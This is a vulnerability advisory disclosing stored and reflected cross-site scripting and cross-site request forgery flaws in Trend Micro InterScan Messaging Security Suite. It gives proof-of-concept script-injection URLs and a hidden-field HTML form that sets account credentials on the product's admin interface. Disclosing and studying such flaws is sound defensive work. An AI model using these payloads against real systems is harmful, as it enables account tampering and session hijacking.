Trend Micro InterScan Messaging Security Suite: Multiple Vulnerabilities

We discovered that Trend Micro InterScan Messaging Security Suite is vulnerable to Cross Site Scripting and Cross-site Request Forgery.

Proof of Concept

The vulnerabilities POC are as follow:

Cross-site Scripting (CVE-2012-2995) (CWE-79)

Persistent/Stored XSS

hxxps://127.0.0.1:8445/addRuleAttrWrsApproveUrl.imss?wrsApprovedURL=xssxss"<script>alert('XSS')</script>

Non-persistent/Reflected XSS

hxxps://127.0.0.1/initUpdSchPage.imss?src=<script>alert(‘XSS’)</script>

Cross-Site Request Forgery (CVE-2012-2996) (CWE-352)

<html>
 <body>
  <form action="hxxps://127.0.0.1:8445/saveAccountSubTab.imss" method="POST">
   <input type="hidden" name="enabled" value="on" />
   <input type="hidden" name="authMethod" value="1" />
   <input type="hidden" name="name" value="quorra" />
   <input type="hidden" name="password" value="quorra.123" />
   <input type="hidden" name="confirmPwd" value="quorra.123" />
   <input type="hidden" name="tabAction" value="saveAuth" />
   <input type="hidden" name="gotoTab" value="saveAll" />
   <input type="submit" value="CSRF" />
  </form>
 </body>
</html>

Solution

Currently, we are not aware of any solution from the vendor. You may contact them for patch or update of the product. As a temporary solution, you may restrict access to this application to prevent unauthorized user from making use of this vulnerability.

References

http://cwe.mitre.org/data/definitions/352.html
http://cwe.mitre.org/data/definitions/79.html
http://www.trendmicro.com/us/enterprise/network-security/interscan-message-security/index.html